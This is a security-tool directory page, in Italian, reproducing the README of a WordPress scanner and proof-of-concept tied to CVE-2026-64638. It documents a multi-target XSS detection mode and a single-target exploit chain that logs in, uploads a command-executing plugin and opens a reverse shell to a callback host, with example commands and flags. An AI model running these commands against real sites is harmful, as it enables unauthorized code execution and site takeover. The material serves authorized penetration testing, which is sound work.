Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
XSS2Shell-CVE-2026-64638 — Scanner di sicurezza WordPress che identifica le versioni, rileva XSS riflessi su più obiettivi contemporaneamente e supporta un flusso di lavoro di exploit autenticato da XSS a RCE per test autorizzati. | Kitploit
Strumenti/GitHubGitHub/mr-leonardogomes/xss2shell-cve-2026-64638
RicognizioneScanner di Vulnerabilità WebExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubmr-leonardogomes/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

Scanner di sicurezza WordPress che identifica le versioni, rileva XSS riflessi su più obiettivi contemporaneamente e supporta un flusso di lavoro di exploit autenticato da XSS a RCE per test autorizzati.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
171 mese faNon ancora revisionato
Condividi

🔍 @Mr-LeonardoGomes

💀 XSS2Shell-CVE-2026-64638

Versão 2026 Status Ativo PRs Bem-vindos Licença MIT
Feito com amor Bug Bounty 2026 Pentest Metodologia

Metodologia di Caccia ai Bug 2026

XSS2Shell Scanner Multi-Target

Sviluppatore: Credito: YogaGymn

Utilità PoC/scanning per test di sicurezza autorizzati su WordPress. Il progetto contiene un flusso di sfruttamento per un target singolo e una modalità solo scan multi-target concorrente.

Importante: Utilizza questo progetto solo su installazioni WordPress di tua proprietà o per le quali hai esplicita autorizzazione a testare. Lo scanner multi-target è volutamente limitato all'identificazione della versione e al rilevamento della riflessione XSS; non esegue cattura di credenziali, upload di plugin o RCE contro un elenco di target.

Funzionalità

Modalità target singolo

Lo script originale supporta:

  • Identificazione della versione di WordPress.
  • Rilevamento della riflessione XSS.
  • Modalità auto, xss e direct.
  • Flusso di autenticazione diretta su WordPress e upload di plugin.
  • Funzionalità di concatenamento XSS presente nel PoC originale.
  • Funzionalità opzionale di callback/reverse-shell presente nel PoC originale.

Modalità multi-target

Lo scanner aggiunto supporta:

  • Lettura dei target da un file di testo.
  • Rimozione dei target duplicati.
  • Scansione concorrente con ThreadPoolExecutor.
  • Numero configurabile di worker.
  • Rilevamento della versione di WordPress.
  • Rilevamento della riflessione XSS.
  • Report di avanzamento.
  • Risultati salvati nello stesso ordine del file di input.
  • Statistiche riassuntive.

La modalità multi-target non chiama le funzioni RCE originali.

Requisiti

  • Python 3.9+
  • requests

Installa la dipendenza:

root@kitploit:~
python3 -m pip install requests

Se la tua distribuzione Linux utilizza un ambiente Python gestito esternamente, usa un ambiente virtuale:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install requests

Installazione

Clona o copia il progetto: originale dell'exploit yogaGymn

root@kitploit:~
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638

Oppure posiziona semplicemente:

root@kitploit:~
xss2shell.py

nella tua directory di lavoro.

Scanner Multi-Target

Crea un file chiamato targets.txt OU alvos.txt:

root@kitploit:~
https://example1.test
https://example2.test
https://example3.test

Commenti e righe vuote vengono ignorati:

root@kitploit:~
# Alvos de laboratório autorizado
https://example1.test

https://example2.test

Esegui lo scanner:

root@kitploit:~
python3 xss2shell.py -i targets.txt

La concorrenza predefinita è di 10 worker.

Modificare la concorrenza

Ad esempio, usa 20 worker:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 20

Per un piccolo laboratorio:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 5

Non scegliere un numero di worker inutilmente alto, perché potrebbe aumentare il carico di connessioni e attivare limiti di velocità o controlli difensivi.

Modificare il file di output

root@kitploit:~
python3 xss2shell.py \
  -i targets.txt \
  --workers 10 \
  --output results.txt

Esempio di output

root@kitploit:~
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE

[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)

=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected  : 1
Not detected  : 2
Errors        : 0
Results saved : scan_results.txt

Formato del risultato

Il file predefinito scan_results.txt usa campi separati da tabulazioni:

root@kitploit:~
TARGET  WORDPRESS_VERSION  XSS_STATUS  XSS_DETAIL

Esempio:

root@kitploit:~
https://example1.test    6.8.2    XSS_NOT_DETECTED          ESCAPED
https://example2.test    6.7.1    XSS_REFLECTION_DETECTED   AREA_BYPASS

Valori di stato XSS


Stato Significato


XSS_REFLECTION_DETECTED Lo scanner ha rilevato il comportamento di riflessione HTML testato. Non è di per sé una prova di RCE.

XSS_NOT_DETECTED La riflessione testata non è stata rilevata.

ERROR Il controllo ha riscontrato un'eccezione.

Valori dei dettagli XSS

Lo scanner può riportare dettagli come:

  • RAW_HTML
  • AREA_BYPASS
  • ESCAPED
  • STRIPPED
  • NOT_REFLECTED

Questi valori descrivono la risposta osservata dalla routine di rilevamento; devono essere validati manualmente prima di considerare un risultato come una vulnerabilità confermata.

Utilizzo con target singolo

Lo script originale supporta anche argomenti per target singolo.

Modalità automatica

root@kitploit:~
python3 xss2shell.py \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

Modalità diretta

root@kitploit:~
python3 xss2shell.py \
  --mode direct \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

Modalità XSS

root@kitploit:~
python3 xss2shell.py \
  --mode xss \
  --lhost 192.0.2.10 \
  http://authorized-lab.test

I flussi di lavoro XSS/diretti possono creare o attivare un plugin contenente funzionalità di esecuzione dei comandi. Usali solo in un ambiente di test autorizzato.

Riferimento CLI

root@kitploit:~
usage: xss2shell.py [-h]
       [-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
       [--mode {auto,xss,direct}]
       [-u USERNAME] [-p PASSWORD]
       [--lhost LHOST] [--lport LPORT]
       [--slug SLUG] [--callback-port CALLBACK_PORT]
       [--no-rev]
       [target]

Argomenti


Argomento Descrizione


target URL del target singolo.

-i, --input File contenente più target.

--output File di output per i risultati multi-target. Predefinito: scan_results.txt.

--workers Numero di worker concorrenti. Predefinito: 10.

--mode Modalità originale per target singolo: auto, xss o direct.

-u, --username Nome utente WordPress per il flusso di lavoro originale diretto/fallback.

-p, --password Password WordPress per il flusso di lavoro originale diretto/fallback.

--lhost Host di callback/reverse-shell per il PoC originale.

--lport Porta della reverse-shell. Predefinita: 4444.

--slug Slug del plugin. Predefinito: xss2shell.

--callback-port Porta del server di callback. Predefinita: 9090.

--no-rev Salta l'attivazione della reverse-shell nel flusso di lavoro originale.

Come funziona la scansione concorrente

La modalità multi-target utilizza la seguente funzionalità di Python:

root@kitploit:~
ThreadPoolExecutor

Ogni target viene inviato come attività di scansione indipendente:

root@kitploit:~
targets.txt
     |
     v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ... 
+----+----+----+----+
  |    |    |    |
  v    v    v    v
 WP   WP   WP   WP
 XSS  XSS  XSS  XSS
  |    |    |    |
  +----+----+----+
        |
        v
   scan_results.txt

I risultati vengono raccolti man mano che le attività vengono completate, mentre l'output finale viene generato seguendo l'ordine originale dei target.

Ambito e Sicurezza

La modalità multi-target è progettata per valutazioni di sicurezza autorizzate e ambienti di laboratorio.

Flusso di lavoro consigliato:

  1. Ottieni l'autorizzazione per iscritto.
  2. Includi solo domini/IP autorizzati nel file targets.txt.
  3. Inizia con un numero ridotto di worker (processi di esecuzione).
  4. Analizza l'output dello scanner.
  5. Valida manualmente le scoperte rilevanti.
  6. Documenta le prove e la remediation.

Non utilizzare lo scanner contro sistemi di terze parti senza autorizzazione.

Limitazioni

Lo scanner non è uno strumento completo di valutazione delle vulnerabilità.

In particolare:

  • Una riflessione HTML rilevata non prova automaticamente l'esistenza di una vulnerabilità XSS sfruttabile.
  • La versione di WordPress ottenuta da endpoint pubblici può essere assente o errata.
  • Lo stato unknown (sconosciuto) non significa che il target sia vulnerabile.
  • Errori di rete possono generare risultati incompleti.
  • Il comportamento di WAF/CDN può influenzare il rilevamento.
  • Lo scanner non determina la sfruttabilità o la possibilità di RCE nella modalità multi-target.
  • I risultati devono essere verificati manualmente prima di segnalare una vulnerabilità.

Struttura del Progetto

root@kitploit:~
.
├── xss2shell.py
├── targets.txt
└── scan_results.txt

Licenza

Non erano presenti informazioni sulla licenza nel codice sorgente fornito.

Se questo progetto viene pubblicato pubblicamente, aggiungi un file di licenza esplicito, come LICENSE. Questo codice è uno sviluppo successivo del codice originale di ZSecurity.

Scarica lo strumento